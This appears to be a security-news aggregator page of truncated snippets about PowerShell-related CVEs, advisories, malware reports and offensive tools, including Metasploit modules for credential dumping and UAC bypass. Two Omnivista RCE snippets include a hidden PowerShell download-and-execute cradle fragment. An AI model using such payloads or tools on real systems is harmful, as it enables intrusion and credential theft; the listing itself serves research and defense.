CVE-2017-0007

CVE-2017-0007 is a Device Guard security feature bypass in Windows 10 (Gold/1511/1607) and Windows Server 2016 where sign-checked PowerShell scripts could be modified without breaking the signature, allowing execution of unsigned/malicious code. Root cause: Device Guard’s validation of certain el...

MS17-012: Security Update for Microsoft Windows (4013078)

The remote Windows host is missing a security update. It is, therefore, affected by multiple vulnerabilities : - A security feature bypass vulnerability exists in Device Guard due to improper validation of certain elements in a signed PowerShell script. An unauthenticated, remote attacker can...

Using the Registry to Discover Unix Systems and Jump Boxes

On red team engagements, Mandiant consultants are often tasked with identifying and obtaining access to critical Unix systems within our client’s environments. The objectives may include obtaining payment card data on point of sale terminals or accessing intellectual property residing on Apple...

New Fileless Malware Uses DNS Queries To Receive PowerShell Commands

It is no secret that cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day. While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that involve the exploitation of standard system...

Researchers Uncover New Leads Behind Shamoon2

In a fresh analysis of the Shamoon2 malware, researchers from Arbor Networks’ Security Engineering and Response Team ASERT say they have unearthed new leads on the tools and techniques used in the most recent wave of attacks. Shamoon2 surfaced in November, approximately four years after the...

NTDS Grabber

This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller. It compresses all these files in a cabinet file called All.cab. This module requires Metasploit: https://metasploit.com/download Current source:...

Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government

Introduction FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government. Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy, a popular remote access tool RAT that has been used for...

Tater - A PowerShell implementation of the Hot Potato Windows Privilege Escalation Exploit

Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit. Included In p0wnedShell - https://github.com/Cn33liz/p0wnedShell PowerShell Empire - https://github.com/PowerShellEmpire/Empire PSAttack - https://github.com/jaredhaight/psattack Functions Invoke-Tater Th...

Improved scripts in .lnk files now deliver Kovter in addition to Locky

Cybercriminals are using a combination of improved script and well-maintained download sites to attempt installing Locky and Kovter on more computers. A few months ago, we reported an email campaign distributing .lnk files with a malicious script that delivered Locky ransomware. Opening the...

AD ACL Scanner

AD ACL Scanner AD ACL Scanner is a tool completly written in PowerShell with GUI used to create reports of access control lists DACLs and system access control lists SACLs in Active Directory . New Features Faster compare of Access Control Lists using USN from replication metadata. Primary...

Certain BIOS versions may include an AMI Test Key that could compromise Secure Boot protections - lu

Lenovo Security Advisory: LEN-7806 Potential Impact: Secure boot may be compromised by an attacker with local access Severity: High Scope of Impact: Lenovo-specific Summary Description: Secure Boot is a security standard to help make sure that your PC boots using only trusted software. When the P...

Enigma Fileless UAC Bypass

a This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ Exploit Title : enigmafilelessuacbypass.rb Module...

Update Rollup 9 for System Center 2012 R2 Virtual Machine Manager

Update Rollup 9 for System Center 2012 R2 Virtual Machine Manager Introduction This article describes the issues that are fixed in Update Rollup 9 for Microsoft System Center 2012 R2 Virtual Machine Manager. There are three updates available for System Center 2012 R2 Virtual Machine Manager: one...

Exploit the Credentials Present in Files and Memory: PowerMemory

PowerMemory is a PowerShell post-exploitation tool. It uses Microsoft binaries and therefore is able to execute on a machine, even after the Device Guard Policies have been set. In the same way, it will bypass antivirus detection. PowerMemory can retrieve credentials information and manipulate...

Windows 'Run As' Using Powershell

This module will start a process as another user using powershell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows 'Run As' Using Powershell', 'Description' = %q This module will start...

Microsoft PowerShell - XML External Entity Injection Vulnerability

Exploit for windows platform in category local exploits + Credits: John Page aka hyp3rlinx Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows PowerShell and PowerShell Core is a task automation and configuration management framework from...

Alcatel Lucent Omnivista 8770 Remote Code Execution（CVE-2016-9796）

No description provided by source. import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...

Microsoft PowerShell - XML External Entity Injection

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows...

Microsoft PowerShell - XML External Entity Injection

Microsoft PowerShell - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product:...

Alcatel Lucent Omnivista 8770 Remote Code Execution

import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...